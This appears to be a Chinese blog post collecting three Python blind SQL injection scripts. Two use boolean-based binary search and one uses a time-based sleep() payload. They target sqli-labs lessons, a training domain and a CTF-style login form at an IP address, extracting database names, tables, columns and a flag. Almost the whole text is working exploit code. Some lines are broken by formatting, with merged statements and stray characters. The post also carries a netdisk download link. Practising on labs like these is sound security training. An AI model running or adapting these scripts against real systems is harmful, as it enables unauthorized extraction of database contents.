- 链接:https://pan.baidu.com/s/1Uw51GRmAA3BRyFSTyVh9nA
提取码:1234
--来自百度网盘超级会员V3的分享
import requests
session = requests.Session()
url = "http://caichuanqi.cn/lab/sqli-labs-master/Less-8/?id=1'" #sql布尔二分法,爆库
def name():
name = ''
for i in range(1,50):
begin = 32
end = 128
tmp = (begin + end) // 2
while begin < end:
paramsPost = "and/**/ascii(substr(database(),{0},1))>{1}-- -" .format(i,tmp)
response = session.get(url+paramsPost)
if 'You are in...........' in response.text:
begin = tmp + 1
tmp = (begin + end) // 2
else:
end = tmp
tmp = (begin + end) // 2
if(tmp==32):
break;
name += chr(tmp)
print(name)def table():
name = ''
for i in range(1,50): a #爆表
begin = 32
end = 128
tmp = (begin + end) // 2
while begin < end:
paramsPost = "and/**/ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{0},1))>{1}-- -" .format(i,tmp)
response = session.get(url+paramsPost)
if 'You are in...........' in response.text:
begin = tmp + 1
tmp = (begin + end) // 2
else:
end = tmp
tmp = (begin + end) // 2
if(tmp==32):
break;
name += chr(tmp)
print(name)
name()
table() - 徐老师的脚本(#post表单页面布尔判断注入)
import requests
session = requests.Session() #post表单页面布尔判断注入
def name():
name = ''
for j in range(100):
begin = 32
end = 128
tmp = (begin + end) // 2
while begin < end:
paramsPost = {"password": "kawhi", "username": "admin\\"}
paramsPost['password'] = "or/**/Ascii(right((username),%d))>%d#"%(j+1,tmp)
print(paramsPost)
response = session.post("http://81.70.89.91:33013/index.php",data=paramsPost)
if 'success.jpg' in response.text:
begin = tmp + 1
tmp = (begin + end) // 2
else:
end = tmp
tmp = (begin + end) // 2
name += chr(tmp)
print(name)
name() - 蔡老师的脚本
import requests
import time
import datetime
url = "http://127.0.0.1/sqlilabs/Less-9/?id=1'"
#url = "http://127.0.0.1/sqlilabs/Less-4/?id=1"
def get_dbname():
dbname = ''
for i in range(1,9):
for k in range(32,127):
payload = " and if(ascii(substr(database(),{0},1))={1},sleep(2),1)--+".format(i,k)
#payload = '") and if(ascii(substr(database(),{0},1))={1},sleep(2),1)--+'.format(i,k)
# payload = " and if(ascii(substr(database(),{0},1))={1},sleep(2),1) --+".format(i,k)
#if语句里面的sleep(2)为如果注入语句正确浏览器就休眠两秒,也可以和1调换位置(那样就是如果语句错误休眠两秒)
time1 = datetime.datetime.now()
#获得提交payload之前的时间
res = requests.get(url + payload)
time2 = datetime.datetime.now()
#获得payload提交后的时间
difference = (time2 - time1).seconds
#time,time2时间差,seconds是只查看秒
if difference > 1:
dbname += chr(k)
else:
continue
print("数据库名为->"+dbname)
get_dbname()
def get_table():
table1 = ''
table2 = ''
table3 = ''
table4 = ''
for i in range(5):
for j in range(6):
for k in range(32,127):
payload = "and if(ascii(substr((select table_name from information_schema.tables where table_schema=\'security\' limit %d,1),%d,1))=%d,sleep(2),1)--+"%(i,j,k)
time1 = datetime.datetime.now()
res = requests.get(url + payload)
time2 = datetime.datetime.now()
difference = (time2-time1).seconds
if difference > 1:
if i == 0:
table1 += chr(k)
print("第一个表为->"+table1)
elif i == 1:
table2 += chr(k)
print("第二个表为->"+table2)
elif i == 3:
table3 += chr(k)
print("第三个表为->"+table3)
elif i == 4:
table4 += chr(k)
print("第四个表为->"+table4)
else:
break
get_table()
def get_column():
column1 = ''
column2 = ''
column3 = ''
for i in range(3):
for j in range(1,9):
for k in range(32,127):
payload = "and if(ascii(substr((select column_name from information_schema.columns where table_name=\'flag\' limit %d,1),%d,1))=%d,sleep(2),1)--+"%(i,j,k)
time1 = datetime.datetime.now()
res = requests.get(url+payload)
time2 = datetime.datetime.now()
difference = (time2-time1).seconds
if difference > 1:
if i == 0:
column1 += chr(k)
print("字段一为->"+column1)
if i == 1:
column2 += chr(k)
print("字段二为->"+column2)
if i == 2:
column3 += chr(k)
print("字段三为->"+column3)
else:
break
get_column()def get_flag():
flag = ''
for i in range(30):
for k in range(32,127):
payload = "and if(ascii(substr((select flag from flag),%d,1))=%d,sleep(2),1)--+"%(i,k)
time1 = datetime.datetime.now()
res = requests.get(url+payload)
time2 = datetime.datetime.now()
difference = (time2-time1).seconds
if difference > 1:
flag += chr(k)
print("flag为->"+flag)
get_flag()
sql注入之盲注脚本
发布于 2022-03-12 90 次阅读